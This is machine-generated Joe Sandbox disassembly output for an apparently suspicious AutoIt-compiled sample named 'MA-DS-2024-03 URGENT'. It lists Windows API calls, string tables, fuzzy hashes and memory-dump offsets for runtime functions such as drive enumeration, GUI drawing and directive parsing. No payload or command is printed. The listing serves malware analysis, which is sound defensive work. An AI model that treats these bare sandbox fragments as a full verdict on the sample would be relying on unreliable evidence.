                                                        • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                        • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                        • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                        • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                        • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                        • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: ce0f0248606af78ccd81055a81288a9bc3f997fd33c224b6d577db6a67c2b9cd
                                                        • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                        • Opcode Fuzzy Hash: ce0f0248606af78ccd81055a81288a9bc3f997fd33c224b6d577db6a67c2b9cd
                                                        • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0048A903
                                                        • SetTextColor.GDI32(?,?), ref: 0048A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0048A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                        • GetSysColor.USER32(00000011), ref: 0048A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                        • SelectObject.GDI32(?,?), ref: 0048A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                        • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                        • DeleteObject.GDI32(?), ref: 0048AA89
                                                        • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                        • DeleteObject.GDI32(?), ref: 0048AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: f494a7411c48f5e7fd0fcdc65f06905e9b344178169c197affe29c411b6fe10c
                                                        • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                        • Opcode Fuzzy Hash: f494a7411c48f5e7fd0fcdc65f06905e9b344178169c197affe29c411b6fe10c
                                                        • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                        • CharNextW.USER32(0000014E), ref: 00488B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                        • _memset.LIBCMT ref: 00488C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                        • _memset.LIBCMT ref: 00488CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                        • DrawMenuBar.USER32(?), ref: 00488EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: acd43d964c9f79b746e59a855526a859d217a01e4a39f380eab83080f2ec0215
                                                        • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                        • Opcode Fuzzy Hash: acd43d964c9f79b746e59a855526a859d217a01e4a39f380eab83080f2ec0215
                                                        • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004849CA
                                                        • GetDesktopWindow.USER32 ref: 004849DF
                                                        • GetWindowRect.USER32(00000000), ref: 004849E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                        • DestroyWindow.USER32(?), ref: 00484A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                        • IsWindowVisible.USER32(?), ref: 00484B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                        • GetWindowRect.USER32(?,?), ref: 00484B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                        • CopyRect.USER32(?,?), ref: 00484BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                        • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                        • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                        • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                        • _wcscpy.LIBCMT ref: 00464500
                                                        • _wcscmp.LIBCMT ref: 0046450B
                                                        • _wcscat.LIBCMT ref: 00464521
                                                        • _wcsstr.LIBCMT ref: 0046452C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                        • _wcscat.LIBCMT ref: 00464591
                                                        • _wcscat.LIBCMT ref: 00464598
                                                        • _wcsncpy.LIBCMT ref: 004645C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 84693badfcaee18dc147f2574c13799befe7203a24675f70ea48bb6cde0c79b9
                                                        • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                        • Opcode Fuzzy Hash: 84693badfcaee18dc147f2574c13799befe7203a24675f70ea48bb6cde0c79b9
                                                        • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                        • GetStockObject.GDI32(00000011), ref: 004029CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                          • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                          • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                        • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                        • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                        • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                        • __swprintf.LIBCMT ref: 0045A51B
                                                        • _wcscmp.LIBCMT ref: 0045A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                        • _wcscmp.LIBCMT ref: 0045A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                        • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                        • GetParent.USER32(?), ref: 0045A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                        • _wcscmp.LIBCMT ref: 0045A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                        • _wcscmp.LIBCMT ref: 0045A76B
                                                          • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                        • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                        • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                        • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                        • _wcscmp.LIBCMT ref: 0045AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                        • _wcscmp.LIBCMT ref: 0045AF8C
                                                        • _wcsstr.LIBCMT ref: 0045AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                        • _wcscmp.LIBCMT ref: 0045AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                        • _wcscmp.LIBCMT ref: 0045B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                        • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                        • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                        • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                          • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                          • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                          • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                        • _wcscat.LIBCMT ref: 0048C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                        • DragFinish.SHELL32(?), ref: 0048C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                        • API String ID: 169749273-3863044002
                                                        • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                        • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                        • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                        • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                        • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                        • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                        • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
